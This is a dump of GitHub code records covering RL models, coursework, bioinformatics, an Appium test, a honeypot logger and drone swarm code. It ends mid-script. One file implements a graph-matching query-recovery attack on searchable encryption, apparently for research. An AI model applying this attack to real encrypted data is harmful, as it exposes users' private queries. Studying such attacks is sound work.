webdocMetadata.toHtml()\n","repo_name":"modu/website_grokit_ca","sub_path":"ws_root/ws_django/webdoc/webdoc_entry.py","file_name":"webdoc_entry.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"34027741811","text":"import gym\n\nfrom ray.rllib.utils.framework import try_import_tf\nfrom ray.rllib.models import ModelCatalog\nfrom ray.rllib.models.tf.tf_modelv2 import TFModelV2\nfrom ray.rllib.models.tf import FullyConnectedNetwork\nfrom ray.rllib.utils.annotations import override\nfrom ray.rllib.models.preprocessors import get_preprocessor\n\n\ntf = try_import_tf()\n\n\ndef observation_adapter(obs: dict):\n # convert obs to an array\n features = []\n for key, value in obs.items():\n if len(value.shape) > 3:\n continue\n features.append(value)\n features_array = tf.concat(features, axis=-1)\n\n # move axis: (height, width, channel)\n features_array = tf.transpose(features_array, perm=[0, 2, 1])\n res = {\"feature_input\": features_array}\n if obs.get(\"img_gray\", None) is not None:\n img_gray = tf.transpose(obs[\"img_gray\"], perm=[0, 2, 3, 1])\n res[\"vision_input\"] = img_gray\n return res\n\n\ndef get_shapes(space_dict: gym.spaces.Dict):\n feature_dim, vision_shape = 0, None\n stack_size = 1\n for key, space in space_dict.spaces.items():\n if key == \"img_gray\":\n vision_shape = space.shape\n else:\n feature_dim += space.shape[-1]\n stack_size = space.shape[0]\n\n if vision_shape is not None:\n return (feature_dim, stack_size), vision_shape[1:] + (vision_shape[0],)\n else:\n return (feature_dim, stack_size), None\n\n\nclass DictCNN(TFModelV2):\n NAME = \"DictCNN\"\n\n def __init__(\n self, obs_space, action_space, num_outputs, model_config, name, **kwargs\n ):\n super(DictCNN, self).__init__(\n obs_space, action_space, num_outputs, model_config, name\n )\n custom_model_config = model_config[\"custom_model_config\"]\n obs_space_dict = kwargs.get(\"obs_space_dict\", None) or custom_model_config.get(\n \"obs_space_dict\", None\n )\n assert obs_space_dict is not None\n\n # convert mix observation to ...\n feature_shape, vision_shape = get_shapes(obs_space_dict)\n feature_input = tf.keras.Input(feature_shape)\n vision_input = (\n tf.keras.Input(vision_shape) if vision_shape is not None else None\n )\n\n feature_conv_1 = tf.keras.layers.Conv1D(\n filters=16, kernel_size=3, activation=tf.nn.tanh\n )(feature_input)\n feature_flat = tf.keras.layers.Flatten()(feature_conv_1)\n\n vision_flat = None\n if vision_shape is not None:\n vision_conv_1 = tf.keras.layers.Conv2D(\n filters=32, kernel_size=4, strides=2, activation=tf.nn.tanh\n )(vision_input)\n vision_conv_2 = tf.keras.layers.Conv2D(\n filters=64, kernel_size=11, strides=1, activation=tf.nn.tanh\n )(vision_conv_1)\n vision_flat = tf.keras.layers.Flatten()(vision_conv_2)\n\n if vision_flat is not None:\n self._use_vision = True\n concat_state = tf.keras.layers.Concatenate(axis=-1)(\n [feature_flat, vision_flat]\n )\n else:\n self._use_vision = False\n concat_state = feature_flat\n value_layer = tf.keras.layers.Dense(units=1)(concat_state)\n value_layer = tf.reshape(value_layer, (-1,))\n # output_layer = tf.keras.layers.Dense(units=64, activation=tf.nn.relu)(concat_state)\n output_layer = tf.keras.layers.Dense(units=num_outputs)(concat_state)\n\n self.base_model = (\n tf.keras.Model([feature_input, vision_input], [output_layer, value_layer])\n if vision_shape is not None\n else tf.keras.Model([feature_input], [output_layer, value_layer])\n )\n self.register_variables(self.base_model.variables)\n self._value_out = None\n\n @override(TFModelV2)\n def value_function(self):\n return self._value_out\n\n def forward(self, input_dict, state, seq_lens):\n obs = input_dict[\"obs\"]\n obs = observation_adapter(obs)\n inputs = (\n [obs[\"feature_input\"], obs[\"vision_input\"]]\n if self._use_vision\n else [obs[\"feature_input\"]]\n )\n model_out, self._value_out = self.base_model(inputs)\n return model_out, state\n\n\nclass FCModel(FullyConnectedNetwork):\n NAME = \"FCModel\"\n\n\nclass CCModel(TFModelV2):\n NAME = \"CCModel\"\n CRITIC_OBS = \"CRITIC_OBS\"\n\n def __init__(\n self, obs_space, action_space, num_outputs, model_config, name, **kwargs\n ):\n super(CCModel, self).__init__(\n obs_space, action_space, num_outputs, model_config, name\n )\n\n # ordered dict\n agent_number = 4\n critic_obs = gym.spaces.Dict(\n {\n **{f\"AGENT-{i}\": obs_space for i in range(agent_number)},\n **{f\"AGENT-{i}-action\": action_space for i in range(agent_number)},\n }\n )\n\n self.critic_preprocessor = get_preprocessor(critic_obs)(critic_obs)\n self.obs_preprocessor = get_preprocessor(obs_space)(obs_space)\n self.act_preprocessor = get_preprocessor(action_space)(action_space)\n model_config[\"custom_model_config\"] = dict()\n # inner network\n self.action_model = DictCNN(\n obs_space,\n action_space,\n num_outputs,\n model_config,\n name + \"_action\",\n **kwargs,\n )\n self.value_model = FullyConnectedNetwork(\n gym.spaces.Box(low=-1e10, high=1e10, shape=self.critic_preprocessor.shape),\n action_space,\n 1,\n model_config,\n name + \"_vf\",\n )\n self.register_variables(self.action_model.variables())\n self.register_variables(self.value_model.variables())\n\n def forward(self, input_dict, state, seq_lens):\n return self.action_model.forward(input_dict, state, seq_lens)\n\n def central_value_function(self, obs):\n # TODO(ming): make inputs as dicts is better\n value, _ = self.value_model({\"obs\": obs})\n return value\n\n @override(TFModelV2)\n def value_function(self):\n return self.model.value_function()\n\n\nModelCatalog.register_custom_model(CCModel.NAME, CCModel)\nModelCatalog.register_custom_model(DictCNN.NAME, DictCNN)\nModelCatalog.register_custom_model(FCModel.NAME, FCModel)\n","repo_name":"Taospirit/SMARTS_Track-2","sub_path":"starter_kit/submission/networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":6302,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72204742134","text":"N_identificación=input(\"digite su numero de indentificacion: \")\nprint(N_identificación)\nNombre=\"kevin\"\napellidos=\"Ballesteros Carreño\"\ndirección=input(\"digite su direccion: \")\nteléfono=\"3112078657\"\nEdad=int(input(\"digite su edad\"))\nestado_civil=(input(\"digite su estado civil: \"))\nn_hijos=int(input(\"ingrese el numero de hijos: \"))\nEstatura=input(\"ingrese su estatura: cm\")\nFecha_de_contratación=\"06/06/2020\"\nsueldo_basico= float(input(\"ingrese su sueldo basico: \"))\ndias_laborados=int(input(\"ingrese los dias laborados: \"))\nprint(N_identificación,\" \\n\",Nombre,\" \",apellidos,\" \\n\",dirección,\" \\n\",teléfono,\" \\n\",Edad,\" \\n\",estado_civil,\" \\n\",n_hijos,\" \\n\",Estatura,\" \\n\",Fecha_de_contratación,\" \\n\",sueldo_basico,\" \\n\",dias_laborados)\n\nif Edad >= 55:\n bono= sueldo_basico * 0.05\n total = sueldo_basico + bono\n print(\"el bono de pension es =${:,.0f} y el salario a pagar es =${:,.0f}\".format(bono , total))\nelse:\n print(f\"No tiene bono, su salario es =${sueldo_basico:,.0f}\")\n\nif estado_civil == \"casado\" and n_hijos > 0:\n print(\"habilitado para viaje anual en diciembre\")\nelse:\n print(\"no tiene opcion de viaje en diciembre\")\n\nif sueldo_basico >= 1000000 and sueldo_basico < 1500000:\n com2 = sueldo_basico * 0.2\n print(f\"Tiene un bono de comisión del 2%: {com2:,.0f}\")\n\nif sueldo_basico >= 1500001 and sueldo_basico < 2000000:\n com5 = sueldo_basico * 0.5\n print(f\"Tiene un bono de comisión del 5%: {com5:,.0f}\")\n \nif dias_laborados > 20 and sueldo_basico < 1000000:\n print(\"Aplica para bono de alimentación\")\nelse:\n print(\"En esta oportunidad no aplicas para bono de alimentación\")\n ","repo_name":"kevballe/talleres-del-curso-de-programacion-kevin-balle","sub_path":"taller1.py","file_name":"taller1.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28476743812","text":"# Track: Bioinformatics Stronghold\r\n# Problem: Complementing a Strand of DNA\r\n# ID: REVC\r\n\r\n# Input: A DNA string 's' having length at most 1000 nt\r\n# Output: The reverse complement of 's^c' of 's'\r\n\r\n# --- Functions --- #\r\ndef reverse_strand(strand):\r\n return strand[::-1]\r\n\r\ndef complement_strand(strand):\r\n reverse = ''\r\n give_me_a_complement_of = { 'A' : 'T', 'T' : 'A', 'G' : 'C', 'C' : 'G' }\r\n for nucleotide in reverse_strand(strand):\r\n reverse += give_me_a_complement_of[nucleotide]\r\n return reverse\r\n\r\n# --- Main program --- #\r\nwith open('./datasets/rosalind_revc.txt', 'r') as f:\r\n dataset = f.read().splitlines()[0]\r\n\r\nwith open('./outputs/rosalind_revc_1_output.txt', 'w') as f:\r\n f.write(complement_strand(dataset))\r\n","repo_name":"petarnikolovski/rosalind-solutions","sub_path":"bioinformatics-stronghold/revc.py","file_name":"revc.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38933890245","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nimport os\r\nimport stat\r\nimport subprocess\r\nclass GraphMattacker:\r\n def __init__(self,sim_kw_d,real_td_d,alpha = 0.5,alg=\"PATH\",init=\"unif\"):\r\n self.sim_kw_d = sim_kw_d\r\n self.real_td_d = real_td_d\r\n self.td_num = len(self.real_td_d)\r\n #self.real_td_d=np.vstack((self.real_td_d,np.zeros((len(self.sim_kw_d)-len(self.real_td_d),len(self.real_td_d[0])))))\r\n \r\n self.real_M = np.dot(self.real_td_d,self.real_td_d.T)/len(self.real_td_d[0])\r\n self.sim_M = np.dot(self.sim_kw_d,self.sim_kw_d.T)/len(self.sim_kw_d[0])\r\n\r\n self.tdid_2_kwsid = {}\r\n self.unrec_td_set = set([i for i in range(len(self.real_td_d))])\r\n self.id_known_kws=None\r\n self.id_queried_kws=None\r\n\r\n self.alpha = alpha\r\n self.alg = alg\r\n self.init = init\r\n\r\n \r\n\r\n def attack(self):\r\n G = self.sim_M\r\n np.fill_diagonal(G,0)\r\n H = self.real_M\r\n np.fill_diagonal(H,0)\r\n C = self.built_C()\r\n if not os.path.exists(\"./src_graphm/temp/graphm\"):\r\n os.makedirs(\"./src_graphm/temp/graphm\")\r\n with open(\"src_graphm/temp/graphm/G1.txt\",\"wb\") as f:\r\n for row in G:\r\n row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n f.write(row_str.encode('ascii'))\r\n with open(\"src_graphm/temp/graphm/G2.txt\",\"wb\") as f:\r\n for row in H:\r\n row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n f.write(row_str.encode('ascii'))\r\n with open(\"src_graphm/temp/graphm/C.txt\",\"wb\") as f:\r\n for row in C:\r\n row_str = ' '.join(\"{:.6f}\".format(val) for val in row) + '\\n'\r\n f.write(row_str.encode('ascii'))\r\n write_config([self.alg],self.init,self.alpha)\r\n with open(\"src_graphm/temp/graphm/run_script\", 'w') as f:\r\n f.write(\"#!/bin/sh\\n\")\r\n f.write(\"src_graphm/graphm-0.51/bin/graphm src_graphm/temp/graphm/config.txt\\n\")\r\n st = os.stat(\"src_graphm/temp/graphm/run_script\")\r\n os.chmod(\"src_graphm/temp/graphm/run_script\", st.st_mode | stat.S_IEXEC)\r\n subprocess.run([\"src_graphm/temp/graphm/run_script\"], capture_output=True)\r\n \r\n with open(\"src_graphm/temp/graphm/X.txt\") as f:\r\n \r\n while(f.readline()!=self.alg+\" \\n\"):\r\n continue\r\n result = f.readlines()\r\n result = [int(i) for i in result]\r\n for i in range(len(result)):\r\n if result[i]-1 1:\r\n raise ValueError(\"a cannot be negative or greater than 1 ({})\".format(a))\r\n else:\r\n entropy = -a * np.log(a) - (1 - a) * np.log(1 - a)\r\n return n * entropy - 0.5 * np.log(2 * np.pi * n * a * (1 - a))\r\ndef compute_log_binomial_probability_matrix(ntrials, probabilities, observations):\r\n \"\"\"\r\n This code is from https://github.com/simon-oya/USENIX21-sap-code/blob/master/attacks.py\r\n Computes the logarithm of binomial probabilities of each pair of probabilities and observations.\r\n :param ntrials: number of binomial trials\r\n :param probabilities: vector with probabilities\r\n :param observations: vector with integers (observations)\r\n :return log_matrix: |probabilities|x|observations| matrix with the log binomial probabilities\r\n \"\"\"\r\n probabilities = np.array(probabilities)\r\n probabilities[probabilities == 0] = min(probabilities[probabilities > 0]) / 100 # To avoid numerical errors. An error would mean the adversary information is very off.\r\n log_binom_term = np.array([_log_binomial(ntrials, obs / ntrials) for obs in observations]) # ROW TERM\r\n column_term = np.array([np.log(probabilities) - np.log(1 - np.array(probabilities))]).T # COLUMN TERM\r\n last_term = np.array([ntrials * np.log(1 - np.array(probabilities))]).T # COLUMN TERM\r\n log_matrix = log_binom_term + np.array(observations) * column_term + last_term\r\n return log_matrix\r\n\r\ndef write_config(Alg,init,alpha):\r\n\r\n config_text = \"\"\"//*********************GRAPHS**********************************\r\n//graph_1,graph_2 are graph adjacency matrices,\r\n//C_matrix is the matrix of local similarities between vertices of graph_1 and graph_2.\r\n//If graph_1 is NxN and graph_2 is MxM then C_matrix should be NxM\r\ngraph_1=src_graphm/temp/graphm/G1.txt s\r\ngraph_2=src_graphm/temp/graphm/G2.txt s\r\nC_matrix=src_graphm/temp/graphm/C.txt s\r\n//*******************ALGORITHMS********************************\r\n//used algorithms and what should be used as initial solution in corresponding algorithms\r\nalgo={alg:s} s\r\nalgo_init_sol={init:s} s\r\nsolution_file=solution_im.txt s\r\n//coeficient of linear combination between (1-alpha_ldh)*||graph_1-P*graph_2*P^T||^2_F +alpha_ldh*C_matrix\r\nalpha_ldh={alpha:.6f} d\r\ncdesc_matrix=A c\r\ncscore_matrix=A c\r\n//**************PARAMETERS SECTION*****************************\r\nhungarian_max=10000 d\r\nalgo_fw_xeps=0.01 d\r\nalgo_fw_feps=0.01 d\r\n//0 - just add a set of isolated nodes to the smallest graph, 1 - double size\r\ndummy_nodes=0 i\r\n// fill for dummy nodes (0.5 - these nodes will be connected with all other by edges of weight 0.5(min_weight+max_weight))\r\ndummy_nodes_fill=0 d\r\n// fill for linear matrix C, usually that's the minimum (dummy_nodes_c_coef=0),\r\n// but may be the maximum (dummy_nodes_c_coef=1)\r\ndummy_nodes_c_coef=0.01 d\r\n\r\nqcvqcc_lambda_M=10 d\r\nqcvqcc_lambda_min=1e-5 d\r\n\r\n\r\n//0 - all matching are possible, 1-only matching with positive local similarity are possible\r\nblast_match=0 i\r\nblast_match_proj=0 i\r\n\r\n\r\n//****************OUTPUT***************************************\r\n//output file and its format\r\nexp_out_file=src_graphm/temp/graphm/X.txt s\r\nexp_out_format=Permutation s\r\n//other\r\ndebugprint=0 i\r\ndebugprint_file=debug.txt s\r\nverbose_mode=1 i\r\n//verbose file may be a file or just a screen:cout\r\nverbose_file=cout s\r\n\"\"\".format(alg=\" \".join(alg for alg in Alg), init=\" \".join(\"unif\" for _ in Alg),alpha=alpha)\r\n with open(\"src_graphm/temp/graphm/config.txt\",\"w\") as f:\r\n f.write(config_text)\r\n\r\n \r\n","repo_name":"JigsawAttack/JigsawAttack","sub_path":"attack/graphmattack.py","file_name":"graphmattack.py","file_ext":"py","file_size_in_byte":6751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71002081974","text":"# -*- coding: utf-8 -*-\n\"\"\"实时库存信息\n\n\"\"\"\n\nimport json\nfrom bs4 import BeautifulSoup\nimport math\nfrom datetime import datetime\n\nfrom eaglet.decorator import param_required\n#from wapi import wapi_utils\nfrom eaglet.core.cache import utils as cache_util\nfrom db.mall import models as mall_models\nfrom db.mall import promotion_models\n#import resource\nfrom eaglet.core import watchdog\nfrom business import model as business_model\nimport settings\n\n\nclass RealtimeStock(business_model.Model):\n\t\"\"\"\n\t实时库存信息\n\t\"\"\"\n\t__slots__ = (\n\t\t'model2stock',\n\t)\n\n\t@staticmethod\n\t@param_required(['product_id'])\n\tdef from_product_id(args):\n\t\t\"\"\"\n\t\t工厂方法,根据product_id获取商品的实时库存信息\n\n\t\t@param[in] product_id: 商品id\n\n\t\t@return RealtimeStock业务对象\n\t\t\"\"\"\n\t\tproduct_id = args['product_id']\n\t\tmodels = mall_models.ProductModel.select().dj_where(product=product_id, is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\t@staticmethod\n\t@param_required(['model_ids'])\n\tdef from_product_model_ids(args):\n\t\t\"\"\"\n\t\t工厂方法,根据product_id获取相应的库存信息\n\n\t\t@param[in] product_id: 商品id\n\n\t\t@return RealtimeStock业务对象\n\t\t\"\"\"\n\t\tmodel_ids = args['model_ids']\n\t\tmodels = mall_models.ProductModel.select().dj_where(id__in=model_ids, is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\tdef __init__(self):\n\t\tbusiness_model.Model.__init__(self)\n\n\tdef init(self, models):\n\t\tself.model2stock = dict()\n\t\tfor model in models:\n\t\t\tmodel_data = dict()\n\t\t\tmodel_data[\"stocks\"] = model.stocks\n\t\t\tmodel_data[\"stock_type\"] = model.stock_type\n\t\t\tself.model2stock[model.id] = model_data\n\n\tdef to_dict(self, **kwargs):\n\t\treturn self.model2stock\n\n\t@staticmethod\n\t@param_required(['product_id', 'model_name'])\n\tdef from_product_model_name(args):\n\t\t\"\"\"\n\t\t工厂方法,根据product_id获取相应的库存信息\n\n\t\t@param[in] product_id: 商品id\n\t\t@param[in] model_name: 规格名称\n\n\t\t@return RealtimeStock业务对象\n\t\t\"\"\"\n\t\tproduct_id = args['product_id']\n\t\tmodel_name = args['model_name']\n\t\tmodels = mall_models.ProductModel.select().dj_where(product_id=product_id, name=model_name,is_deleted=False)\n\t\trealtime_stock = RealtimeStock()\n\t\trealtime_stock.init(models)\n\n\t\treturn realtime_stock\n\n\n\n","repo_name":"chengdg/apiserver","sub_path":"business/mall/realtime_stock.py","file_name":"realtime_stock.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"17720921556","text":"from Tkinter import *\nimport ttk\n\n\nclass AdminBanWindow:\n def __init__(self, main_window):\n self.master = Toplevel()\n self.main_window = main_window\n\n self.master.geometry('1100x550')\n self.master.resizable(width=False, height=False)\n\n self.master.title(\"Ban Management\")\n\n self.FILES_FRAME = ttk.LabelFrame(self.master, text='Files', height=460, width=890)\n self.FILES_FRAME.place(relx=0, rely=0.001)\n\n self.COLUMNS = ('Category', 'File', 'Size', 'Uploader', 'Date')\n self.FILES = ttk.Treeview(self.FILES_FRAME, columns=self.COLUMNS, show='headings', height=21)\n FILES_ysb = ttk.Scrollbar(orient=VERTICAL, command=self.FILES.yview)\n xsb = ttk.Scrollbar(orient=HORIZONTAL, command=self.FILES.xview)\n self.FILES['yscroll'] = FILES_ysb.set\n self.FILES['xscroll'] = xsb.set\n\n self.FILES.grid(row=0, column=0)\n FILES_ysb.grid(in_=self.FILES_FRAME, row=0, column=1, sticky=NS)\n\n","repo_name":"edensit/--ChatClient","sub_path":"GUI/admin_ban_window.py","file_name":"admin_ban_window.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31584468700","text":"import os\nimport threading\n\nfrom twisted.python import log\n\nLOGFILE = 'attempts.txt'\nLOGFILE_LOCK = threading.Lock()\n\ndef writetosession(ip,message):\n LOGFILE_LOCK.acquire()\n originaldirectory = str(os.getcwd())\n directory = originaldirectory +\"/victims\"\n newfile = directory+\"/victim-\"+ip+\".txt\"\n f = open(newfile,'a')\n f.write(message)\n f.close()\n LOGFILE_LOCK.release()\n\ndef normalwrite(file,message):\n LOGFILE_LOCK.acquire()\n originaldirectory = str(os.getcwd())\n directory = originaldirectory +\"/victims\"\n newfile = directory +\"/\" +file\n f = open(newfile,'a')\n f.write(message)\n f.close()\n LOGFILE_LOCK.release()\n\ndef start_logging():\n originaldirectory = str(os.getcwd())\n newfile = originaldirectory + \"/percuma.log\"\n log.startLogging(open(newfile, 'a'))\n","repo_name":"fajarprstio/percuma_ta","sub_path":"core/percuma_logging.py","file_name":"percuma_logging.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10026402422","text":"import logging\nimport os\n\nfrom ._version import get_versions\n\n__version__ = get_versions()[\"version\"]\ndel get_versions\n\n#\n# Basic logger configuration\n#\n\n\ndef get_logger(name=None):\n \"\"\"Return a logger to use\"\"\"\n return logging.getLogger(\"reproschema\" + (\".%s\" % name if name else \"\"))\n\n\ndef set_logger_level(lgr, level):\n if isinstance(level, int):\n pass\n elif level.isnumeric():\n level = int(level)\n elif level.isalpha():\n level = getattr(logging, level)\n else:\n lgr.warning(\"Do not know how to treat loglevel %s\" % level)\n return\n lgr.setLevel(level)\n\n\n_DEFAULT_LOG_FORMAT = \"%(asctime)s - %(name)s - %(levelname)s - %(message)s\"\n\nlgr = get_logger()\n# Basic settings for output, for now just basic\nset_logger_level(lgr, os.environ.get(\"REPROSCHEMA_LOG_LEVEL\", logging.INFO))\nFORMAT = \"%(asctime)-15s [%(levelname)8s] %(message)s\"\nlogging.basicConfig(format=FORMAT)\n\ntry:\n import etelemetry\n\n etelemetry.check_available_version(\"repronim/reproschema-py\", __version__, lgr=lgr)\nexcept Exception as exc:\n lgr.warning(\n \"Failed to check for a more recent version available with etelemetry: %s\", exc\n )\n","repo_name":"ReproNim/reproschema-py","sub_path":"reproschema/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"30641927582","text":"# author_='Yuxuehong';\n# date: 2023/8/18 13:46\n\n\"\"\"\n整个脚本需要\n构建用例\n执行用例\n生成测试报告 pytest——html\n\"\"\"\n\nfrom 封装的代码 import *\nimport time\nimport random\n\nfrom appium import webdriver\nfrom appium.webdriver.common.mobileby import MobileBy\n\nfrom Options import Options\n\n\ndef test():\n \"\"\"\n 验证通过搜索的功能搜索的书籍,与书城中获取的书籍是相同的\n :return:\n \"\"\"\n \"\"\"\n a.打开读书屋,进入书城\n \"\"\"\n # 1.连接方式一:已知活动名和包名\n # caps = {\n # \"appium:deviceName\": \"emulator-5554\",\n # \"platformName\": \"Android\",\n # \"appium:platformVersion\": \"7.1.2\",\n # \"appium:appPackage\": \"com.zhao.myreader\",\n # \"appium:appActivity\": \"com.zhao.myreader.ui.home.MainActivity\"\n # }\n print(\"你好\")\n # 2.连接方式2:不知道活动名和包名\n # 第一步封装driver 会话请求数据\n # caps = {\n # \"appium:deviceName\": \"emulator-5554\",\n # \"platformName\": \"Android\",\n # \"appium:platformVersion\": \"7.1.2\",\n # \"app\": \"D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk\",\n # \"fullReset\": False, #它会在运行完脚本后帮你卸载掉软件,默认为False不卸载\n # # \"noReset\": True,#它在启动app之前,会清除你的app里面的数据,默认为False重置\n # # #\"newCommandTimeout : 20 \", # 服务器等待客户端命令发送的超时时间,超过改时间,如果还没有发送指令,则appium服务器终止会话状态\n # }\n # {'app': 'D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk', 'platformName': 'Android',\n # 'platformVersion': '7.1.2', 'deviceName': 'emulator-5554'}\n\n caps = Options().app(\"D://2023-L/python+selenium/app/01app自动化环境的搭建/dushuwu.apk\").options()\n driver = webdriver.Remote(command_executor=\"http://127.0.0.1:4723/wd/hub\", desired_capabilities=caps)\n # driver.implicitly_wait(10) # 隐形等待时间\n # driver.wait_activity(activity=\"\",timeout=10) #等待某个avtivity的资源加载完成\n driver.find_element(MobileBy.ACCESSIBILITY_ID, \"书城\").click()\n locator = (MobileBy.XPATH,\n '//androidx.recyclerview.widget.RecyclerView[@resource-id=\"com.zhao.myreader:id/rv_book_list\"]/android.widget.LinearLayout')\n book_elements = wait_visibility_all(driver, *locator)\n\n \"\"\"\n b.随机获取一本书,为验证数据点\n \"\"\"\n\n # 使用随机数构建方式,获取一个在规定范围内的随机数作为元素的的下标\n\n rand_index = random.randint(0, len(book_elements) - 1)\n print(rand_index)\n book_element = book_elements[rand_index]\n\n # c.通过随机指定的书去获取验证数据\n book_name = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_name\").text # 获取书名\n book_desc = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_desc\").text # 获取简介\n book_author = book_element.find_element(MobileBy.ID, \"com.zhao.myreader:id/tv_book_author\").text # 获取作者名\n\n # 获取各章节的名字,并将各章节名字储存到字典中\n book_element.click()\n locator = (MobileBy.ID, 'com.zhao.myreader:id/btn_read_book')\n read_book = wait_clickable(driver, *locator)\n read_book.click()\n locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_content\")\n content = wait_clickable(driver, *locator)\n content.click()\n locator = (MobileBy.ID, \"com.zhao.myreader:id/ll_chapter_list\")\n chapter_list = wait_clickable(driver, *locator)\n chapter_list.click()\n locator = (MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_chapter_list\"]/android.widget.LinearLayout')\n chapter_lists = wait_visibility_all(driver, *locator)\n book_chapters = dict()\n # for i in chapter_lists:\n # book_chapter.append(i.find_element(MobileBy.ID,\"com.zhao.myreader:id/tv_chapter_title\").text)\n for index, element in enumerate(chapter_lists):\n locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_chapter_title\")\n book_chapters.update({index: wait_visibility(element, *locator).text})\n\n \"\"\"\n d、再去搜索里面按照该书名进行搜索\n \"\"\"\n # 两个返回返回到搜索按钮界面\n driver.back()\n time.sleep(3)\n driver.back()\n time.sleep(2)\n # 进入搜索界面\n locator = (MobileBy.ID, \"com.zhao.myreader:id/iv_search\")\n search = wait_visibility(driver, *locator)\n search.click()\n # 输入随机获取的书籍名称\n locator = (MobileBy.ID, \"com.zhao.myreader:id/et_search_key\")\n search_key = wait_visibility(driver, *locator)\n search_key.send_keys(book_name)\n\n # 搜索书籍\n locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_search_conform\")\n search_conform = wait_visibility(driver, *locator)\n search_conform.click()\n\n # 获取所有的章节目录\n search_books_elements = driver.find_elements(\n MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_search_books_list\"]/android.widget.LinearLayout')\n search_index = None\n for i in search_books_elements:\n search_book_name = i.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_name').text\n if search_book_name == book_name:\n search_index = search_books_elements.index(i)\n\n if search_index is None:\n raise ValueError(\"没有找到 《{}》 这本书\".format(book_name))\n else:\n\n search_book = search_books_elements[search_index]\n # 获取书籍名\n search_book_name = search_book.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_name').text\n # 获取书籍简介\n search_book_desc = search_book.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_desc').text\n # 获取书籍作者\n search_book_author = search_book.find_element(MobileBy.ID, 'com.zhao.myreader:id/tv_book_author').text\n # 打开选中书籍\n search_book.click()\n search_book_chapters = dict()\n # 点击开始阅读\n locator = (MobileBy.ID, 'com.zhao.myreader:id/btn_read_book')\n search_read_book = wait_visibility(driver, *locator)\n search_read_book.click()\n # 点击书籍文字\n locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_content\")\n search_content = wait_visibility(driver, *locator)\n search_content.click()\n # 点击目录\n locator = (MobileBy.ID, \"com.zhao.myreader:id/ll_chapter_list\")\n search_chapter_list = wait_clickable(driver, *locator)\n search_chapter_list.click()\n # 将目录中章节顺序和章节内容存储在字典中\n locator = (\n MobileBy.XPATH, '//*[@resource-id=\"com.zhao.myreader:id/lv_chapter_list\"]/android.widget.LinearLayout')\n search_chapter_lists = wait_visibility_all(driver, *locator)\n for index, element in enumerate(search_chapter_lists):\n locator = (MobileBy.ID, \"com.zhao.myreader:id/tv_chapter_title\")\n search_book_chapters.update(\n {index: wait_visibility(element, *locator).text})\n\n assert book_name == search_book_name and book_desc == search_book_desc and book_author == search_book_author and book_chapters == search_book_chapters, \"断言失败,数据不一致\"\n\n\nif __name__ == \"__main__\":\n import pytest\n\n # pytest.main([\"-vs\"])\n # pytest.main([\"--html=report1.html\"])\n # pytest.main([\"-vs\", \"--html=report2.html\"])\n pytest.main([\"--html=./reports/report2.html\", \"--self-contained-html\"])\n","repo_name":"yuxuehong0512/appium_test","sub_path":"appauto/Test_framework/test_frame1.py","file_name":"test_frame1.py","file_ext":"py","file_size_in_byte":7549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38588978448","text":"import time\n\nimport cflib.crtp\nfrom cflib.crazyflie.log import LogConfig\nfrom cflib.crazyflie.swarm import CachedCfFactory\nfrom cflib.crazyflie.swarm import Swarm\nfrom cflib.crazyflie.syncLogger import SyncLogger\n\n# Change uris and sequences according to your setup\nURI1 = 'radio://0/70/2M/E7E7E7E701'\nURI2 = 'radio://0/70/2M/E7E7E7E702'\nURI3 = 'radio://0/70/2M/E7E7E7E703'\nURI4 = 'radio://0/70/2M/E7E7E7E704'\nURI5 = 'radio://0/70/2M/E7E7E7E705'\nURI6 = 'radio://0/70/2M/E7E7E7E706'\nURI7 = 'radio://0/70/2M/E7E7E7E707'\nURI8 = 'radio://0/70/2M/E7E7E7E708'\nURI9 = 'radio://0/70/2M/E7E7E7E709'\nURI10 = 'radio://0/70/2M/E7E7E7E70A'\n\n\nz0 = 0.4\nz = 1.0\n\nx0 = 0.7\nx1 = 0\nx2 = -0.7\n\ny0 = -1.0\ny1 = -0.4\ny2 = 0.4\ny3 = 1.0\n\n# x y z time\nsequence1 = [\n (x0, y0, 